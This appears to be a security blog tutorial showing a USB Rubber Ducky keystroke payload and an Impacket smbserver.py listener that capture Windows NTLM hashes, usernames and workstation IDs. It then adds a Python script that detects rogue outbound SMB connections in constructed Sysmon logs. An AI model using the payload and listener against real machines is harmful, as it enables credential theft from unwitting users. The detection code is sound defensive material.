What's the quickest way to steal a Windows password hash?

Using a USB Rubber Ducky and this simple payload, Windows password hashes can be captured for cracking in less than two seconds.

This technique works against almost all versions of Microsoft Windows and only requires a five-line Ducky Script and an open-source server set up on the target network.

Killer Effort:Reward Ratio

This is actually one of my favorite USB Rubber Ducky payloads for policy compliance and information security awareness. It leverages built-in functionality of the Microsoft Windows operating system, requires next to nothing in terms of privileges, and executes faster than a user could reasonably thwart the attack by unplugging the seemingly benign "USB thumb drive".

The intel gained from this extremely quick attack is also of great value to any penetration tester or internal red team: timestamp, workstation ID, username and even the NTLM hash. What's not to love?

What you'll need

The Ducky Script

REM Super Quick Hash Grab Payload for USB Rubber Ducky
REM Target: Windows 9X and beyond! Author: Hak5Darren
DELAY 1000
GUI r
DELAY 100
STRING \\hostname
ENTER

That's literally it. Just replace hostname with the hostname or IP address of your listening server running Impacket's smbserver.py.

The Server

This USB Rubber Ducky payload attempts to access an SMB share on the network - \\hostname. When Windows attempts to open this share, part of the process is NTLM authentication, in which the client sends its NTLM network hash (the challenge-response) along with its hostname (workstation ID) and username. Of course you'll also get the timestamp. What more could one ask for?

Rather than using an actual SMB server, we'll want to use Impacket's smbserver.py, since it'll allow us to easily capture all of this information. The basic usage is to supply a share name and point it at a directory. The share name can be anything really, from tmp (served from /tmp/) to "YOU'VE BROKEN COMPANY USB POLICY. IT WILL CONTACT YOU SOON" (served from /stuff/):

impacket/examples/smbserver.py tmp /tmp/

Have fun with that one.

Now of course this payload will work best when you have the listening SMB server on the target LAN, as most good firewalls will prevent SMB access over the Internet. At least - they should... ;-)
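From the blue-team side, the same property that makes this payload quick also makes it visible: the Run dialog opens \\hostname, and the Windows SMB client turns that into an outbound TCP connection to port 445 (or 139) on a box that is not one of the organisation's file servers. The script below is an added example, not Hak5's or Impacket's code. It reads Sysmon Event ID 3 (network connection) records as JSON and flags outbound SMB connections to destinations outside an approved file-server list, with a separate reason when SMB is leaving the RFC 1918 address space (which the firewall discussed above should already block). The Sysmon field names are real; the event records, the allowlist and the server name fs01.corp.example are constructed for this example.

```python
"""Flag outbound SMB connections to hosts that are not sanctioned file servers.

Added example (not Hak5's or Impacket's code). Input is modelled on Sysmon
Event ID 3 records serialised as JSON, one object per line. The records and
the allowlist are constructed for this example.
"""
import ipaddress
import json
from dataclasses import dataclass
from typing import List, Optional

SMB_PORTS = {445, 139}

# Hypothetical allowlist (assumption): approved file servers by name or subnet.
APPROVED_SMB_SERVERS = [
    "fs01.corp.example",
    ipaddress.ip_network("10.10.5.0/24"),  # file-server VLAN
]

# RFC 1918 ranges: SMB should never leave these.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed Sysmon Event ID 3 records.
SAMPLE_EVENTS = [
    # Normal: approved file server
    r'{"EventID": 3, "UtcTime": "2024-03-01 09:12:01.001", "User": "CORP\\alice", '
    r'"Image": "System", "Initiated": "true", "DestinationIp": "10.10.5.20", '
    r'"DestinationHostname": "fs01.corp.example", "DestinationPort": 445}',
    # Run dialog -> \\10.10.7.200: an unknown box on the LAN serving SMB
    r'{"EventID": 3, "UtcTime": "2024-03-01 09:12:44.310", "User": "CORP\\alice", '
    r'"Image": "System", "Initiated": "true", "DestinationIp": "10.10.7.200", '
    r'"DestinationHostname": "", "DestinationPort": 445}',
    # Ordinary HTTPS traffic, not SMB
    r'{"EventID": 3, "UtcTime": "2024-03-01 09:13:02.004", "User": "CORP\\alice", '
    r'"Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "Initiated": "true", '
    r'"DestinationIp": "203.0.113.50", "DestinationHostname": "", "DestinationPort": 443}',
    # SMB leaving the private address space: egress filtering has failed
    r'{"EventID": 3, "UtcTime": "2024-03-01 09:15:17.900", "User": "CORP\\bob", '
    r'"Image": "System", "Initiated": "true", "DestinationIp": "203.0.113.9", '
    r'"DestinationHostname": "", "DestinationPort": 445}',
    # Inbound SMB (Initiated=false) is a different question; ignored here
    r'{"EventID": 3, "UtcTime": "2024-03-01 09:16:00.000", "User": "NT AUTHORITY\\SYSTEM", '
    r'"Image": "System", "Initiated": "false", "DestinationIp": "10.10.7.15", '
    r'"DestinationHostname": "", "DestinationPort": 445}',
]


@dataclass(frozen=True)
class Finding:
    time: str
    user: str
    image: str
    destination: str
    port: int
    reason: str


def is_approved(ip: str, hostname: str) -> bool:
    """True if the destination matches an allowlisted name or subnet."""
    addr = ipaddress.ip_address(ip)
    for entry in APPROVED_SMB_SERVERS:
        if isinstance(entry, str):
            if hostname and hostname.lower() == entry.lower():
                return True
        elif addr in entry:
            return True
    return False


def classify(ev: dict) -> Optional[str]:
    """Return a reason if the event is a suspicious outbound SMB connection, else None."""
    if ev.get("EventID") != 3 or str(ev.get("Initiated", "")).lower() != "true":
        return None  # not a network-connection event, or not opened by this host
    try:
        port = int(ev.get("DestinationPort", 0))
        addr = ipaddress.ip_address(ev.get("DestinationIp", ""))
    except ValueError:
        return None  # malformed port or address
    if port not in SMB_PORTS or is_approved(str(addr), ev.get("DestinationHostname", "")):
        return None
    if not any(addr in net for net in RFC1918):
        return "outbound SMB to a non-RFC1918 address (egress filter should block 445/139)"
    return "outbound SMB to a host that is not an approved file server"


def find_rogue_smb(lines) -> List[Finding]:
    """Parse JSON event lines and return one Finding per suspicious SMB connection."""
    findings = []
    for line in lines:
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed log lines
        reason = classify(ev)
        if reason is None:
            continue
        findings.append(Finding(
            time=ev.get("UtcTime", ""),
            user=ev.get("User", ""),
            image=ev.get("Image", ""),
            destination=ev.get("DestinationHostname") or ev.get("DestinationIp", ""),
            port=int(ev["DestinationPort"]),
            reason=reason,
        ))
    return findings


if __name__ == "__main__":
    for f in find_rogue_smb(SAMPLE_EVENTS):
        print(f"{f.time} {f.user} -> {f.destination}:{f.port} via {f.image}: {f.reason}")
```

Run against the constructed events it reports two connections: the unknown LAN host at 10.10.7.200 and the public address 203.0.113.9, both from the System image, which is where the kernel SMB client shows up in Sysmon. In a real deployment the allowlist would come from inventory data, and the alert is worth correlating with a USB keyboard device arriving moments earlier on the same workstation.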
